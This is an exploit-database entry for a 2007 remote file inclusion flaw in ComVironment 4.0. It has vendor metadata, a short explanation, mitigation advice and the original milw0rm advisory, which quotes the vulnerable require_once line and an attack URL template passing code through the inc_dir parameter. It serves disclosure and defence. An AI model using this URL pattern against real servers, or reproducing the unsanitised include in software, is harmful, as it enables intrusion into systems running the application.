ComVironment 4.0 Remote Code Execution

vendor:

ComVironment

by:

GolD_M = Mahmood_ali

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: ComVironment

Affected Version From: 4

Affected Version To: 4

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

ComVironment 4.0 Remote Code Execution

The ComVironment 4.0 application is vulnerable to remote code execution. This vulnerability exists in the 'grab_globals.lib.php' file, specifically on line 3. The vulnerable code can be exploited by providing a malicious code in the 'inc_dir' parameter. An attacker can craft a specially crafted URL to execute arbitrary code on the target system.

Mitigation:

Apply the latest patch or upgrade to a newer version of the ComVironment application. Ensure proper input validation and sanitization of user-supplied data.

Source

Exploit-DB raw data:

/###################################################################\
#  ComVironment 4.0                                                 #
# =========================================================         #
# Published : 2007-01-18                                            #
# Remote: Yes                                                       #
# Site:http://switch.dl.sourceforge.net/sourceforge/comvironment/   #
#####################################################################
# Author: GolD_M = Mahmood_ali                                      #
# Contact: HackEr_@W.cN                                             #
# =====================================================             #
# ThanX=All My Friends- ABDULLAH00 - Jaeger                         #
# SpeciaL GreeTz : TrYaG-Team & 4lKaSrGoLd3N-Team                   #
\###################################################################/
/###################################################################\
# In :                                                              #
# /libraries/grab_globals.lib.php                                   #
# LiNe:                                                             #
# /3                                                                #
# Vulnerable Code:                                                  #
# require_once($inc_dir . 'libraries/grab_functions' . $ext);       #
# ExPlOiT :                                                         #
# /libraries/grab_globals.lib.php?inc_dir=[Evil-Code]               #
#                                                                   #
#                                                                   #
#             /#######################################\             #
#             #         TrYaG.Com & DwRaT.Com         #             #
#             \#######################################/             #
\###################################################################/

# milw0rm.com [2007-01-18]